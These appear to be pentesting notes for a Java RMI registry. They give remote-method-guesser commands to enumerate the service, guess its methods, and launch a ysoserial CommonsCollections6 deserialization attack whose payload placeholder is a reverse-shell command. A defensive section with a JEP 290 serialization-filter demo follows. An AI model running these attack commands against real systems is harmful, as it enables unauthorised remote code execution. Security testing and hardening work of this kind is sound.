RMI Registry Java Pentesting
Tool: https://github.com/qtc-de/remote-method-guesser
Port: 1099
STEPS:
1) Enumerate RMI protocol
java -jar rmg-4.4.1-jar-with-dependencies.jar enum IP_ADDRESS 1099
2) Guess methods in the service via a dictionary attack
java -jar rmg-4.4.1-jar-with-dependencies.jar guess IP_ADDRESS 1099
3) Conduct a serialization attack against the service
java -jar rmg-4.4.1-jar-with-dependencies.jar serial IP_ADDRESS 1099 --yso /opt/ysoserial.jar --bound-name monitoring --signature 'String sendData(String dummy,Object dummy2)' CommonsCollections6 'COMMAND_HERE_TO_REVERSE_SHELL'
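
MITIGATION EXAMPLE (added here, not part of the original notes or of remote-method-guesser): step 3 works because a parameter typed Object, as in the sendData signature above, is deserialized on the server before the method body runs. The sketch below shows a JEP 290 serialization filter rejecting an unexpected class; the class name RmiArgFilterDemo, the filter pattern and the sample objects are assumptions made for this illustration.

```java
import java.io.*;
import java.util.HashMap;

// Added illustration: a deserialization allowlist for a service whose
// remote methods legitimately receive only String arguments (assumption).
public class RmiArgFilterDemo {
    // Allow java.lang.String, cap the object graph, reject every other class.
    static final String PATTERN =
        "maxdepth=5;maxrefs=100;maxbytes=4096;java.lang.String;!*";

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream buf = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(buf)) {
            out.writeObject(o);
        }
        return buf.toByteArray();
    }

    // Stands in for server-side unmarshalling of an Object parameter:
    // readObject() is called on caller-supplied bytes.
    static String unmarshal(byte[] data, ObjectInputFilter filter) throws Exception {
        try (ObjectInputStream in =
                 new ObjectInputStream(new ByteArrayInputStream(data))) {
            if (filter != null) {
                in.setObjectInputFilter(filter);
            }
            Object o = in.readObject();
            return "accepted " + o.getClass().getName();
        } catch (InvalidClassException e) {
            // Thrown when the filter returns REJECTED for a class in the stream.
            return "rejected: " + e.getMessage();
        }
    }

    public static void main(String[] args) throws Exception {
        ObjectInputFilter filter = ObjectInputFilter.Config.createFilter(PATTERN);

        byte[] expected = serialize("hello");
        // Constructed sample: a harmless HashMap standing in for any class
        // the service never expects to receive.
        byte[] unexpected = serialize(new HashMap<String, String>());

        System.out.println("no filter, HashMap : " + unmarshal(unexpected, null));
        System.out.println("filter,    String  : " + unmarshal(expected, filter));
        System.out.println("filter,    HashMap : " + unmarshal(unexpected, filter));
    }
}
```

The same pattern can be applied process-wide with the jdk.serialFilter system property or ObjectInputFilter.Config.setSerialFilter. Replacing Object parameters with concrete types in remote interfaces narrows what the service has to accept in the first place.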